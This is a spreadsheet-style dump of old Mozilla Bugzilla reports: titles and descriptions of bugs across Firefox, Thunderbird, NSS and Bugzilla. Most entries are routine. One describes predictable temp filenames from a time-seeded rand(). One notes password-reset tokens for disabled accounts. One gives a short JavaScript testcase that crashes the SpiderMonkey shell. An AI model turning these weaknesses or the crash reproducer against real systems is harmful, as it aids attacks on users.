  <si>
    <t>FIREFOX_BUILD_SYSTEM-404327</t>
  </si>
  <si>
    <t>Remove unused gopher files on update</t>
  </si>
  <si>
    <t>Since bug 273459 we no longer ship these files
  res/html/gopher-audio.gif
  res/html/gopher-binary.gif
  res/html/gopher-find.gif
  res/html/gopher-image.gif
  res/html/gopher-menu.gif
  res/html/gopher-movie.gif
  res/html/gopher-sound.gif
  res/html/gopher-telnet.gif
  res/html/gopher-text.gif
  res/html/gopher-unknown.gif
They are in the Firefox 3.0a8 release but not 3.0b1rc3. During a test update between those two versions the files weren't removed so we should add them to removed-files.in - then everything stays in sync: new installs over-the-top installs updated isntalls. Including Thunderbird so that it doesn't get missed and CC'ing Calendar &amp; Suite for the matching changes.</t>
  </si>
  <si>
    <t>CORE-487900</t>
  </si>
  <si>
    <t>Enable SSE2 code for x86_64 in qcms</t>
  </si>
  <si>
    <t>Created attachment 372192
patch v1
SSE2 code in qcms is only for IA32.  We should enable it for x86_64 platform.</t>
  </si>
  <si>
    <t>BUGZILLA-455814</t>
  </si>
  <si>
    <t>token.cgi should reject password change requests for disabled accounts</t>
  </si>
  <si>
    <t>One may want to use a mailing-list as global watcher to get all the Bugzilla activity (instead of using a bot such as supybot) and mark this account as disabled to prevent anyone from using it to log in. But you currently still can request a token to change the password despite the account is disabled. You should not be allowed to do such a request for disabled accounts.
Probably a one-liner in token.cgi right after:
    $user_account = Bugzilla::User-&gt;check($login_name)</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-369428</t>
  </si>
  <si>
    <t>nsExternalAppHandler::SetUpTempFile uses a poor source of randomness resulting in predictable filenames</t>
  </si>
  <si>
    <t>nsExternalAppHandler::SetUpTempFile uses srand/rand (a PRNG not suited for security) to create its random filenames.  Worse it calls srand with a predictable value (the current time) rather than relying on something else to call srand beforehand.
As long as Firefox needs to use random filenames for helper app files (due to bug 230606) it should make sure they're truly unpredictable.  Do we have something that can provide good random bits to C++ code maybe in NSS?
Discovered by Michal Zalewski.  Split from bug 369390 which describes how this
can be combined with several other bugs to pull off a pretty good exploit with
a little user interaction.</t>
  </si>
  <si>
    <t>CORE-145378</t>
  </si>
  <si>
    <t>No feedback that we can't print preview when not connected to a printer</t>
  </si>
  <si>
    <t>Build:
------
2002-05-17-08-1.0.0 Win2K commercial
Steps:
------
(a) Open web page
(b) Choose File | Print Preview
Actual results:
---------------
Nothing happens.  No feedback.  No print preview mode.  No error alerts.
Expected results:
-----------------
We should be able to print preview even if we aren't connected to a printer yet.
 If not at the very least an error dialog should be tossed up indicating why
the user can't print preveiw and what stesp to take (hook up to a printer I
suppose).
Is this better handled in the front-end?</t>
  </si>
  <si>
    <t>CORE-398571</t>
  </si>
  <si>
    <t>PRBool misuse bugs in accessible/</t>
  </si>
  <si>
    <t>Created attachment 283576
Autogenerated patch
Errors reported by prcheck</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-189828</t>
  </si>
  <si>
    <t>technologyreview.com - When I try to search the archive nothing happens.  Works fine in IE</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021212
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3a) Gecko/20021212
javascript is not working in Mozilla but is on IE.
Reproducible: Always
Steps to Reproduce:
1.go to website
2.try to search archive for 2002
3.
Actual Results:  
nothing.
Expected Results:  
should have taken me to a page with all 2002 magazine issues.</t>
  </si>
  <si>
    <t>bbrown</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-511749</t>
  </si>
  <si>
    <t>tryserver: e-mails should include link to build results</t>
  </si>
  <si>
    <t>I love the tryserver e-mail notification but I wish it would send me a link to the build results it's notifying me about.  The tryserver tinderbox page is big enough now that it takes me a while to hunt down my results.</t>
  </si>
  <si>
    <t>BUGZILLA-340713</t>
  </si>
  <si>
    <t>Remove B4 from 2.20 2.22 and trunk docs as we require 5.6.1 already</t>
  </si>
  <si>
    <t>B.4. Bundle::Bugzilla makes me upgrade to Perl 5.6.1
This should go away on 2.20 2.22 and trunk since we require already Perl 5.6.1 on those.
2.18 requires Perl 5.6.0 so it should still live there.</t>
  </si>
  <si>
    <t>NSS-661672</t>
  </si>
  <si>
    <t>Add A-Trust-nQual-03 root CA certificate to NSS</t>
  </si>
  <si>
    <t>Created attachment 536980
A-Trust-nQual-03 Root Cert
This bug requests inclusion in the NSS root certificate store of the following
certificate owned by A-Trust.
Friendly name: A-Trust-nQual-03
Certificate location: http://www.a-trust.at/certs/A-Trust-nQual-03.crt
SHA1 Fingerprint: D3:C0:63:F2:19:ED:07:3E:34:AD:5D:75:0B:32:76:29:FF:D5:9A:F2
Trust flags: Websites
Test URL: https://test1.a-trust.at/ 
This CA has been assessed in accordance with the Mozilla project guidelines
and the certificate approved for inclusion in bug #530797.
The next steps are as follows:
1) A representative of the CA must confirm that all the data in this bug is
correct and that the correct certificate has been attached.
2) A Mozilla representative creates a patch with the new certificate and
provides a special test version of Firefox.
3) A representative of the CA uses the test version of Firefox to confirm (by
adding a comment in this bug) that the certificate has been correctly
imported and that websites work correctly.
4) The Mozilla representative requests that another Mozilla representative
review the patch.
5) The Mozilla representative adds (commits) the patch to NSS then closes this
bug as RESOLVED FIXED.
6) At some time after that various Mozilla products will move to using a
version of NSS which contains the certificate. This process is mostly under
the control of the release drivers for those products.</t>
  </si>
  <si>
    <t>TESTING-529137</t>
  </si>
  <si>
    <t>Update Talos to cleanup child processes</t>
  </si>
  <si>
    <t>Currently Talos cleans up browser-related process before and after a test.  For e10s this code needs to be updated to allow it to cleanup any orphaned child processes as well.</t>
  </si>
  <si>
    <t>THUNDERBIRD-331676</t>
  </si>
  <si>
    <t>Crash on search in threaded mode</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Hi
When I search on Subject or Sender in threaded mode in the main mail window I systematically get a crash when searching for all mails sent by my wife. Lots of other searches go fine but that one blows up every time. I'm afraid I haven't been able to spot another theme or reproduce a simpler test case.
When I'm not in threaded mode the search goes fine (I checked once I say the thread sorts in the stack trace included below from Apple's bug reporting tool).
On a side note (certainly already reported) viewing unread mails in threaded mode has lots of problems - if there are many mails unread in a thread clicking to open the thread doesn't usually work on Windows or Mac.
Cheers
Dave.
Date/Time:      2006-03-25 10:48:07 +0100
OS Version:     10.3.9 (Build 7W98)
Report Version: 2
Command: thunderbird-bin
Path:    /Applications/Thunderbird.app/Contents/MacOS/thunderbird-bin
Version: 1.5 (1.5)
PID:     399
Thread:  0
Exception:  EXC_BAD_ACCESS (0x0001)
Codes:      KERN_PROTECTION_FAILURE (0x0002) at 0x00000000
Thread 0 Crashed:
0   org.mozilla.thunderbird  	0x00202668 nsMsgQuickSearchDBView::SortThreads(int int) + 0x288
1   org.mozilla.thunderbird  	0x001c8478 nsMsgThreadedDBView::Sort(int int) + 0x230
2   org.mozilla.thunderbird  	0x0020212c nsMsgQuickSearchDBView::OnSearchDone(unsigned int) + 0x34
3   org.mozilla.thunderbird  	0x001a3310 nsMsgSearchSession::NotifyListenersDone(unsigned int) + 0xa4
4   org.mozilla.thunderbird  	0x001a3044 nsMsgSearchSession::TimerCallback(nsITimer* void*) + 0xbc
5   libxpcom_core.dylib      	0x10049bbc nsTimerImpl::Fire() + 0xa8
6   libxpcom_core.dylib      	0x10049ce4 handleTimerEvent(TimerEventType*) + 0x8c
7   libxpcom_core.dylib      	0x10045ce4 PL_HandleEvent + 0x24
8   libxpcom_core.dylib      	0x10045c08 PL_ProcessPendingEvents + 0x80
9   com.apple.CoreFoundation 	0x901c3b90 __CFRunLoopDoSources0 + 0x1fc
10  com.apple.CoreFoundation 	0x901c1448 __CFRunLoopRun + 0x1b0
11  com.apple.CoreFoundation 	0x901c5d74 CFRunLoopRunSpecific + 0x148
12  com.apple.HIToolbox      	0x92886e10 RunCurrentEventLoopInMode + 0xac
13  com.apple.HIToolbox      	0x92889eb0 GetNextEventMatchingMask + 0x1a0
14  com.apple.HIToolbox      	0x9289d988 WNEInternal + 0xa0
15  com.apple.HIToolbox      	0x928ae6a0 WaitNextEvent + 0x4c
16  org.mozilla.thunderbird  	0x007fdf04 nsMacMessagePump::GetEvent(EventRecord&amp;) + 0x74
17  org.mozilla.thunderbird  	0x007fde60 nsMacMessagePump::DoMessagePump() + 0x30
18  org.mozilla.thunderbird  	0x0043f9bc nsAppShell::Run() + 0x38
19  org.mozilla.thunderbird  	0x004b7994 nsAppStartup::Run() + 0x3c
20  org.mozilla.thunderbird  	0x0000ecac XRE_main + 0xed0
21  org.mozilla.thunderbird  	0x0000a01c start + 0x1b0
22  org.mozilla.thunderbird  	0x00009e9c start + 0x30
Thread 1:
0   libSystem.B.dylib        	0x9000b46c select + 0xc
1   libnspr4.dylib           	0x0301f140 poll + 0x188
2   libnspr4.dylib           	0x0301b8f4 PR_OpenDir + 0x3b0
3   org.mozilla.thunderbird  	0x0051f08c nsSocketTransportService::Poll(unsigned int*) + 0x74
4   org.mozilla.thunderbird  	0x0051f7d8 nsSocketTransportService::Run() + 0x1b0
5   libxpcom_core.dylib      	0x10048834 nsThread::Main(void*) + 0x38
6   libnspr4.dylib           	0x0301cd80 PR_Select + 0x354
7   libSystem.B.dylib        	0x90024990 _pthread_body + 0x28
Thread 2:
0   libSystem.B.dylib        	0x90018e78 semaphore_timedwait_signal_trap + 0x8
1   libSystem.B.dylib        	0x9000ea14 _pthread_cond_wait + 0x268
2   libnspr4.dylib           	0x03017c68 PR_Unlock + 0x12c
3   libnspr4.dylib           	0x03017ecc PR_WaitCondVar + 0x88
4   libxpcom_core.dylib      	0x1004b41c TimerThread::Run() + 0x19c
5   libxpcom_core.dylib      	0x10048834 nsThread::Main(void*) + 0x38
6   libnspr4.dylib           	0x0301cd80 PR_Select + 0x354
7   libSystem.B.dylib        	0x90024990 _pthread_body + 0x28
Thread 3:
0   libSystem.B.dylib        	0x90018e78 semaphore_timedwait_signal_trap + 0x8
1   libSystem.B.dylib        	0x9000ea14 _pthread_cond_wait + 0x268
2   libnspr4.dylib           	0x03017c68 PR_Unlock + 0x12c
3   libnspr4.dylib           	0x03017ecc PR_WaitCondVar + 0x88
4   org.mozilla.thunderbird  	0x004dd84c nsIOThreadPool::ThreadFunc(void*) + 0x74
5   libnspr4.dylib           	0x0301cd80 PR_Select + 0x354
6   libSystem.B.dylib        	0x90024990 _pthread_body + 0x28
PPC Thread State:
  srr0: 0x00202668 srr1: 0x0200f930                vrsave: 0x00000000
    cr: 0x24024242  xer: 0x20000004   lr: 0x00202660  ctr: 0x10001a34
    r0: 0x00202660   r1: 0xbfffee20   r2: 0x00000000   r3: 0x00000000
    r4: 0xbfffeec4   r5: 0x0000008f   r6: 0xbfffec50   r7: 0x00000000
    r8: 0x00000000   r9: 0x00000030  r10: 0x00000001  r11: 0x00ada448
   r12: 0x10001a34  r13: 0xbffffd4c  r14: 0x00000000  r15: 0x00000001
   r16: 0x00b00000  r17: 0x00000000  r18: 0xbfffee90  r19: 0x04330e94
   r20: 0xbfffee80  r21: 0x04330e80  r22: 0xbfffeeb0  r23: 0xbfffee60
   r24: 0xbfffeea0  r25: 0x0000003c  r26: 0x04330e6c  r27: 0x04332f70
   r28: 0x0432fca0  r29: 0x00afa6a8  r30: 0x00000000  r31: 0x04330e40
Binary Images Description:
    0x1000 -   0xabbfff org.mozilla.thunderbird 1.5	/Applications/Thunderbird.app/Contents/MacOS/thunderbird-bin
 0x18bc000 -  0x18c5fff libqfaservices.dylib 	/Applications/Thunderbird.app/Contents/MacOS/extensions/talkback@mozilla.org/components/libqfaservices.dylib
 0x18ce000 -  0x18d0fff com.apple.textencoding.unicode 1.6.4	/System/Library/TextEncodings/Unicode Encodings.bundle/Contents/MacOS/Unicode Encodings
 0x1c05000 -  0x1c2cfff talkback.dylib 	/Applications/Thunderbird.app/Contents/MacOS/extensions/talkback@mozilla.org/components/talkback/talkback.dylib
 0x2d0e000 -  0x2d39fff libnssckbi.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libnssckbi.dylib
 0x3000000 -  0x3032fff libnspr4.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libnspr4.dylib
 0x4000000 -  0x400dfff libplds4.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libplds4.dylib
 0x5000000 -  0x500efff libplc4.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libplc4.dylib
 0x6000000 -  0x6083fff libmozjs.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libmozjs.dylib
 0x7000000 -  0x7000fff libxpcom.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libxpcom.dylib
 0x8000000 -  0x801bfff libssl3.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libssl3.dylib
 0x9000000 -  0x9060fff libnss3.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libnss3.dylib
 0xa000000 -  0xa01dfff libsmime3.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libsmime3.dylib
 0xb000000 -  0xb07afff libsoftokn3.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libsoftokn3.dylib
 0xc000000 -  0xc018fff libxpcom_compat.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libxpcom_compat.dylib
 0xe000000 -  0xe00dfff libprldap50.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libprldap50.dylib
 0xf000000 -  0xf02efff libldap50.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libldap50.dylib
0x10000000 - 0x10084fff libxpcom_core.dylib 	/Applications/Thunderbird.app/Contents/MacOS/libxpcom_core.dylib
0x80830000 - 0x8090efff libxml2.2.dylib 	/usr/lib/libxml2.2.dylib
0x80a50000 - 0x80ad4fff libstdc++.6.dylib 	/usr/lib/libstdc++.6.dylib
0x81c90000 - 0x81c93fff libmx.A.dylib 	/usr/lib/libmx.A.dylib
0x880f0000 - 0x88226fff com.apple.vImage 1.2.0	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vImage.framework/Versions/A/vImage
0x88999000 - 0x88c47fff com.apple.QuickTime 7.0.4	/System/Library/Frameworks/QuickTime.framework/Versions/A/QuickTime
0x8bea2000 - 0x8beaafff libgcc_s.1.dylib 	/usr/lib/libgcc_s.1.dylib
0x8bf02000 - 0x8bf12fff com.apple.Accelerate.vecLib 3.0.3 (vecLib 3.0.3)	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/vecLib
0x8eea0000 - 0x8eeb6fff libJapaneseConverter.dylib 	/System/Library/CoreServices/Encodings/libJapaneseConverter.dylib
0x8eee0000 - 0x8ef00fff libKoreanConverter.dylib 	/System/Library/CoreServices/Encodings/libKoreanConverter.dylib
0x8ef90000 - 0x8ef9efff libSimplifiedChineseConverter.dylib 	/System/Library/CoreServices/Encodings/libSimplifiedChineseConverter.dylib
0x8efc0000 - 0x8efd3fff libTraditionalChineseConverter.dylib 	/System/Library/CoreServices/Encodings/libTraditionalChineseConverter.dylib
0x8fd50000 - 0x8fd50fff com.apple.Accelerate 1.0.3 (Accelerate 1.0.3)	/System/Library/Frameworks/Accelerate.framework/Versions/A/Accelerate
0x8fe00000 - 0x8fe4ffff dyld 	/usr/lib/dyld
0x90000000 - 0x9014ffff libSystem.B.dylib 	/usr/lib/libSystem.B.dylib
0x901c0000 - 0x9026dfff com.apple.CoreFoundation 6.3.8 (299.36)	/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
0x905a0000 - 0x90610fff com.apple.framework.IOKit 1.3.6 (???)	/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
0x90629000 - 0x90646fff com.apple.audio.SoundManager 3.9	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CarbonSound.framework/Versions/A/CarbonSound
0x90940000 - 0x909b3fff com.apple.DesktopServices 1.2.5	/System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/DesktopServicesPriv
0x90a20000 - 0x90b7bfff com.apple.Foundation 6.3.8 (500.61)	/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
0x910e0000 - 0x91133fff com.apple.bom 1.2.6 (64)	/System/Library/PrivateFrameworks/Bom.framework/Versions/A/Bom
0x9121a000 - 0x912a2fff com.apple.CoreServices.OSServices 3.0.1	/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/OSServices.framework/Versions/A/OSServices
0x91309000 - 0x91341fff com.apple.LaunchServices 10.3.5 (98.4)	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/LaunchServices
0x913a0000 - 0x9145ffff ColorSync 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ColorSync.framework/Versions/A/ColorSync
0x914ad000 - 0x91520fff com.apple.NavigationServices 3.3.3	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/NavigationServices.framework/Versions/A/NavigationServices
0x915e0000 - 0x91699fff com.apple.QD 3.4.70 (???)	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/QD.framework/Versions/A/QD
0x916d9000 - 0x917a1fff libcrypto.0.9.7.dylib 	/usr/lib/libcrypto.0.9.7.dylib
0x91951000 - 0x91951fff com.apple.Cocoa 6.3 (???)	/System/Library/Frameworks/Cocoa.framework/Versions/A/Cocoa
0x91953000 - 0x91953fff com.apple.Carbon 10.3 (???)	/System/Library/Frameworks/Carbon.framework/Versions/A/Carbon
0x91955000 - 0x91955fff com.apple.CoreServices 10.3 (???)	/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
0x91957000 - 0x91957fff com.apple.ApplicationServices 1.0 (???)	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
0x91b30000 - 0x91b44fff libCGATS.A.dylib 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/CoreGraphics.framework/Versions/A/Resources/libCGATS.A.dylib
0x91b60000 - 0x91b6bfff libCSync.A.dylib 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/CoreGraphics.framework/Versions/A/Resources/libCSync.A.dylib
0x91b71000 - 0x91b8bfff libPDFRIP.A.dylib 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/CoreGraphics.framework/Versions/A/Resources/libPDFRIP.A.dylib
0x91c91000 - 0x91d49fff com.apple.audio.toolbox.AudioToolbox 1.3.4	/System/Library/Frameworks/AudioToolbox.framework/Versions/A/AudioToolbox
0x91edf000 - 0x91ef6fff com.apple.LangAnalysis 1.5.4	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/LangAnalysis.framework/Versions/A/LangAnalysis
0x92070000 - 0x92096fff com.apple.FindByContent 1.4 (1.2)	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/FindByContent.framework/Versions/A/FindByContent
0x920a9000 - 0x920bcfff libRIP.A.dylib 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/CoreGraphics.framework/Versions/A/Resources/libRIP.A.dylib
0x92109000 - 0x92121fff com.apple.WebServices 1.1.1 (1.1.0)	/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/WebServicesCore.framework/Versions/A/WebServicesCore
0x92170000 - 0x92357fff com.apple.security 2.4 (179)	/System/Library/Frameworks/Security.framework/Versions/A/Security
0x92647000 - 0x92695fff com.apple.print.framework.Print 3.3	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Print.framework/Versions/A/Print
0x927f0000 - 0x92827fff com.apple.CFNetwork 1.2.2 (7)	/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CFNetwork.framework/Versions/A/CFNetwork
0x92880000 - 0x92c05fff com.apple.HIToolbox 1.3.7 (???)	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox
0x92de0000 - 0x92e30fff com.apple.HIServices 1.4.1 (0.0.1d1)	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/HIServices.framework/Versions/A/HIServices
0x92e70000 - 0x9336ffff com.apple.AppKit 6.3.9 (743.41)	/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
0x93680000 - 0x93958fff com.apple.CoreGraphics 1.203.30 (???)	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/CoreGraphics.framework/Versions/A/CoreGraphics
0x939d0000 - 0x939d4fff libmathCommon.A.dylib 	/usr/lib/system/libmathCommon.A.dylib
0x939e5000 - 0x939eefff com.apple.DiskArbitration 2.0.5	/System/Library/PrivateFrameworks/DiskArbitration.framework/Versions/A/DiskArbitration
0x93a50000 - 0x93a64fff libcups.2.dylib 	/usr/lib/libcups.2.dylib
0x93a6a000 - 0x93a84fff libresolv.9.dylib 	/usr/lib/libresolv.9.dylib
0x941cd000 - 0x94205fff com.apple.AE 1.4	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/AE.framework/Versions/A/AE
0x9438a000 - 0x943a4fff com.apple.openscripting 1.2.1 (???)	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/OpenScripting.framework/Versions/A/OpenScripting
0x94580000 - 0x9458ffff libPSRIP.A.dylib 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/CoreGraphics.framework/Versions/A/Resources/libPSRIP.A.dylib
0x94596000 - 0x945a3fff com.apple.CommonPanels 1.2.1 (1.0)	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/CommonPanels.framework/Versions/A/CommonPanels
0x945b0000 - 0x945b9fff libz.1.dylib 	/usr/lib/libz.1.dylib
0x94650000 - 0x946affff com.apple.SearchKit 1.0.2	/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/SearchKit.framework/Versions/A/SearchKit
0x946ed000 - 0x946fdfff com.apple.speech.recognition.framework 3.3	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SpeechRecognition.framework/Versions/A/SpeechRecognition
0x94723000 - 0x9478afff com.apple.audio.CoreAudio 2.1.3	/System/Library/Frameworks/CoreAudio.framework/Versions/A/CoreAudio
0x947d3000 - 0x947e3fff com.apple.ImageCapture 2.1.5	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/ImageCapture.framework/Versions/A/ImageCapture
0x94800000 - 0x9488cfff com.apple.ink.framework 101.1.4 (55.12)	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Ink.framework/Versions/A/Ink
0x94da7000 - 0x94e16fff libobjc.A.dylib 	/usr/lib/libobjc.A.dylib
0x94fb7000 - 0x94fb7fff com.apple.audio.units.AudioUnit 1.3.3	/System/Library/Frameworks/AudioUnit.framework/Versions/A/AudioUnit
0x951ce000 - 0x95261fff com.apple.print.framework.PrintCore 3.3	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/PrintCore.framework/Versions/A/PrintCore
0x954c0000 - 0x95ac6fff libBLAS.dylib 	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libBLAS.dylib
0x95b20000 - 0x95df0fff libLAPACK.dylib 	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libLAPACK.dylib
0x95f00000 - 0x95f20fff libvMisc.dylib 	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvMisc.dylib
0x9603a000 - 0x96045fff com.apple.securityhi 1.2 (90)	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/SecurityHI.framework/Versions/A/SecurityHI
0x9604d000 - 0x96059fff com.apple.help 1.0.1	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/Help.framework/Versions/A/Help
0x968d0000 - 0x969b2fff libicucore.A.dylib 	/usr/lib/libicucore.A.dylib
0x96a04000 - 0x96a71fff libvDSP.dylib 	/System/Library/Frameworks/Accelerate.framework/Versions/A/Frameworks/vecLib.framework/Versions/A/libvDSP.dylib
0x96aa0000 - 0x96acefff libssl.0.9.7.dylib 	/usr/lib/libssl.0.9.7.dylib
0x96ade000 - 0x96af9fff com.apple.SystemConfiguration 1.7.1 (???)	/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
0x96b50000 - 0x96bdffff ATS 	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/ATS.framework/Versions/A/ATS
0x96c00000 - 0x96c69fff com.apple.htmlrendering 1.1.2	/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HTMLRendering.framework/Versions/A/HTMLRendering
0x96cb0000 - 0x96d9efff libiconv.2.dylib 	/usr/lib/libiconv.2.dylib
0x96de0000 - 0x96df0fff com.apple.vecLib 3.0.3 (vecLib 3.0.3)	/System/Library/Frameworks/vecLib.framework/Versions/A/vecLib
0x96ee0000 - 0x96ee8fff libbsm.dylib 	/usr/lib/libbsm.dylib
0x96eec000 - 0x96efffff com.apple.speech.synthesis.framework 3.2	/System/Library/Frameworks/ApplicationServices.framework/Versions/A/Frameworks/SpeechSynthesis.framework/Versions/A/SpeechSynthesis
0x97345000 - 0x975befff com.apple.CoreServices.CarbonCore 10.3.7	/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/CarbonCore.framework/Versions/A/CarbonCore
Reproducible: Always
Steps to Reproduce:
1. Open thunderbird view inbox in threaded mode
2. Search for a.neary on Subject or Sender
3. Wait for search to finish - oops there goes Thunderbird.
Actual Results:  
Crash
Expected Results:  
No crash</t>
  </si>
  <si>
    <t>bolsh</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-505398</t>
  </si>
  <si>
    <t>BES Upgrade</t>
  </si>
  <si>
    <t>New BES connector should upgrade.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-456221</t>
  </si>
  <si>
    <t>crash report server not returning results</t>
  </si>
  <si>
    <t>I've been trying to retrieve crash reports since yesterday with no luck. 
http://crash-stats.mozilla.com/report/pending/aca38bf3-86bf-11dd-90b0-001cc4e2bf68 is one I just submitted a little while ago and it's not even queuing.</t>
  </si>
  <si>
    <t>CORE-268497</t>
  </si>
  <si>
    <t>keyboard scrolling ends up in select widget when it shouldn't</t>
  </si>
  <si>
    <t>This is the regression bug that I've mentioned a few times but never filed --
probably related to bug 97283 or the corresponding keyboard bug.
Steps to reproduce:
 1. load https://bugzilla.mozilla.org/query.cgi
 2. make the window wide enough so that you can see past the right edge of
    the target combobox
 3. click in the Component dropdown (so you select Address Book or
    something like that)
 4. click in the blank space to the right of the Target combobox
 5. press the down arrow
Expected results:
 5. page scrolls down
Actual results:
 5. Target combobox scrolls down
Firefox Linux trunk November 3.</t>
  </si>
  <si>
    <t>CORE-523083</t>
  </si>
  <si>
    <t>Traverse/unlink cached content list</t>
  </si>
  <si>
    <t>Created attachment 407000
patch
Split from bug 335998.
Peter you wanted to do this in some other way (IIRC traverse/unlink from
element if element is list root) but I never got any good reasons why.
I don't think keeping the subtree rooted by root node alive a bit longer is
a big problem.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-357039</t>
  </si>
  <si>
    <t>need new buttons added to spreadfirefox's affiliate module</t>
  </si>
  <si>
    <t>We have seven new buttons that need to be added to spread firefox's affiliates button module/page/whatever it's called. 
I'm attaching a zip file with the seven new buttons. I suspect they belong in the same directory as all the other buttons. (which I think is http://sfx-images.mozilla.org/affiliates/Buttons/ )
Then I need all the current buttons and banners removed from the page at http://www.spreadfirefox.com/?q=affiliates/homepage so that we're just featuring these seven new buttons. (note I don't want to remove those old buttons from the module just from the html of the page so new people don't see them -- but I don't want to break all the people currently using the old buttons.)</t>
  </si>
  <si>
    <t>CORE-501227</t>
  </si>
  <si>
    <t>Check SpiderMonkey correctness on Sputnik test framework</t>
  </si>
  <si>
    <t>CORE-520511</t>
  </si>
  <si>
    <t>Crash [@ js_PutBlockObject] or [@ 0x1aecdd50] or Assertion failure: JSVAL_IS_OBJECT(v) at ../jsapi.h</t>
  </si>
  <si>
    <t>for (b = 0 b &lt; 1 b++) {
    this.watch(x eval)
}
__defineGetter__(x gc)
var f = (function () {
    __defineSetter__(x function () {})
})
for (i = 0 i &lt; 1 i++) {}
f()
for (let a = 0 a &lt; 1 a++) x = 1
crashes js opt shell on TM tip at js_PutBlockObject near null and asserts dbg shell at Assertion failure: JSVAL_IS_OBJECT(v) at ../jsapi.h:183
autoBisecting soon...
Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Codes: KERN_PROTECTION_FAILURE at 0x000000000000001c
Crashed Thread:  0
Thread 0 Crashed:
0   js-opt-tm-darwin              	0x00068cb3 js_PutBlockObject + 35
1   js-opt-tm-darwin              	0x00057250 js_Interpret + 37040
2   js-opt-tm-darwin              	0x0005df1a js_Execute + 362
3   js-opt-tm-darwin              	0x0000d52c JS_ExecuteScript + 60
4   js-opt-tm-darwin              	0x000040b8 __ZL7ProcessP9JSContextP8JSObjectPci + 1336
5   js-opt-tm-darwin              	0x00008174 main + 2212
6   js-opt-tm-darwin              	0x0000204b _start + 209
7   js-opt-tm-darwin              	0x00001f79 start + 41</t>
  </si>
  <si>
    <t>CORE-258910</t>
  </si>
  <si>
    <t>[FIX]Add a debug-only GetMaxChange() method to nsStyleStruct</t>
  </si>
  <si>
    <t>The goal is to be able to assert that things are in the right section in
nsStyleContext::CalcStyleDifference to prevent things like bug 254053.
David if you think this is a bad idea just let me know and I won't bother
working on it otherwise I'll do this sometime this coming week...</t>
  </si>
  <si>
